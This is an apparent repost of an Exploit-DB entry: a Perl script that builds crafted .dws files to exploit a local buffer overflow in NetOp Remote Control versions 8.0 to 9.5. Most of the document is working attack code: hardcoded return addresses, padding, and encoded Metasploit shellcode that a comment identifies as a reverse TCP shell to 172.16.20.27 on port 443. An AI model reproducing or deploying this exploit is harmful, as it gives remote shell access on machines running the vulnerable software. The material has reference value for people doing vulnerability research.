NetOp Remote Control 8.0/9.1/9.2/9.5 – Local Buffer Overflow

Exploit Database
130 阅读

作者： chap0

日期： 2011-04-28
类别：
- local
平台：
- windows
来源：https://www.exploit-db.com/exploits/17223/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

# Exploit Title: NetOp Remote Control Buffer Overflow

# Date: April 28, 2011

# Author: chap0

# Version: 8.0, 9.1, 9.2, 9.5 (Possibly anything before ver 10)

# Upgrade to Version 10 for fix

# Tested on: Windows XP SP3

# Greetz to JJ IE by day Ninja by night, br34dcrumb5, myne-us, Exploit-DB, Corelan

#!/usr/bin/perl

$file0 = "netop80.dws";

$file1 = "netop91.dws";

$file2 = "netop92.dws";

$file3 = "netop95.dws";

my $junk="\x41" x 524;

my $ret0 = "\x9B\xC2\x40\x20"; #0x2040C29B [nupdate.dll]

my $ret1 = "\xB3\xE9\x3D\x20"; #0x203DE9B3 [nupdate.dll]

my $ret2 = "\x1B\xFC\x44\x20"; #0x2044FC1B [nupdate.dll]

my $ret3 = "\x13\x26\xB5\x20"; #0x20B52613 [nupdate.dll]

my $extra = "\x41" x 20;

#./msfpayload windows/shell_reverse_tcp LHOST=172.16.20.27 LPORT=443 R | msfencode -a x86 -b '\x00\x0a\x0d' -t perl

#[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)

my $shellcode= "\xb8\x34\xc1\xf5\xcc\xdb\xd1\xd9\x74\x24\xf4\x5a\x33\xc9" .

"\xb1\x4f\x31\x42\x14\x03\x42\x14\x83\xc2\x04\xd6\x34\x09" .

"\x24\x9f\xb7\xf2\xb5\xff\x3e\x17\x84\x2d\x24\x53\xb5\xe1" .

"\x2e\x31\x36\x8a\x63\xa2\xcd\xfe\xab\xc5\x66\xb4\x8d\xe8" .

"\x77\x79\x12\xa6\xb4\x18\xee\xb5\xe8\xfa\xcf\x75\xfd\xfb" .

"\x08\x6b\x0e\xa9\xc1\xe7\xbd\x5d\x65\xb5\x7d\x5c\xa9\xb1" .

"\x3e\x26\xcc\x06\xca\x9c\xcf\x56\x63\xab\x98\x4e\x0f\xf3" .

"\x38\x6e\xdc\xe0\x05\x39\x69\xd2\xfe\xb8\xbb\x2b\xfe\x8a" .

"\x83\xe7\xc1\x22\x0e\xf6\x06\x84\xf1\x8d\x7c\xf6\x8c\x95" .

"\x46\x84\x4a\x10\x5b\x2e\x18\x82\xbf\xce\xcd\x54\x4b\xdc" .

"\xba\x13\x13\xc1\x3d\xf0\x2f\xfd\xb6\xf7\xff\x77\x8c\xd3" .

"\xdb\xdc\x56\x7a\x7d\xb9\x39\x83\x9d\x65\xe5\x21\xd5\x84" .

"\xf2\x53\xb4\xc0\x37\x69\x47\x11\x50\xfa\x34\x23\xff\x50" .

"\xd3\x0f\x88\x7e\x24\x6f\xa3\xc6\xba\x8e\x4c\x36\x92\x54" .

"\x18\x66\x8c\x7d\x21\xed\x4c\x81\xf4\xa1\x1c\x2d\xa7\x01" .

"\xcd\x8d\x17\xe9\x07\x02\x47\x09\x28\xc8\xfe\x0e\xbf\x5f" .

"\x10\x84\x5b\xc8\x13\xa4\x5a\xb3\x9d\x42\x36\xd3\xcb\xdd" .

"\xaf\x4a\x56\x95\x4e\x92\x4c\x3d\xf2\x01\x0b\xbd\x7d\x3a" .

"\x84\xea\x2a\x8c\xdd\x7e\xc7\xb7\x77\x9c\x1a\x21\xbf\x24" .

"\xc1\x92\x3e\xa5\x84\xaf\x64\xb5\x50\x2f\x21\xe1\x0c\x66" .

"\xff\x5f\xeb\xd0\xb1\x09\xa5\x8f\x1b\xdd\x30\xfc\x9b\x9b" .

"\x3c\x29\x6a\x43\x8c\x84\x2b\x7c\x21\x41\xbc\x05\x5f\xf1" .

"\x43\xdc\xdb\x01\x0e\x7c\x4d\x8a\xd7\x15\xcf\xd7\xe7\xc0" .

"\x0c\xee\x6b\xe0\xec\x15\x73\x81\xe9\x52\x33\x7a\x80\xcb" .

"\xd6\x7c\x37\xeb\xf2";

print<<EOF;

NetOp Remote Control Buffer Overflow

By chap0 - www.seek-truth.net

Choose a number for the version of NetOp are you attacking:

0 - NetOp 8.0

1 - NetOp 9.1

2 - NetOp 9.2

3 - Netop 9.5

EOF

print "Selection: ";

chomp ($select = <STDIN>);

if ($select =~ 0) {

print "Creating payload for NetOp 8.0\n";

my $payload=$junk.$ret0.$extra.$shellcode;

open(FILE,">$file0");

print FILE $payload;

close(FILE);

print "Done.\n";

}

elsif ($select =~ 1) {

print "Creating payload for NetOp 9.1\n";

my $payload=$junk.$ret1.$extra.$shellcode;

open(FILE,">$file1");

print FILE $payload;

close(FILE);

print "Done.\n";

}

elsif ($select =~ 2) {

print "Creating payload for NetOp 9.2\n";

my $payload=$junk.$ret2.$extra.$shellcode;

open(FILE,">$file2");

print FILE $payload;

close(FILE);

print "Done.\n";

}

elsif ($select =~ 3) {

print "Creating payload for NetOp 9.5\n";

my $payload=$junk.$ret3.$extra.$shellcode;

open(FILE,">$file3");

print FILE $payload;

close(FILE);

print "Done.\n";

}

elsif ($select =~ '') {

print "Please make a selection.\n";

}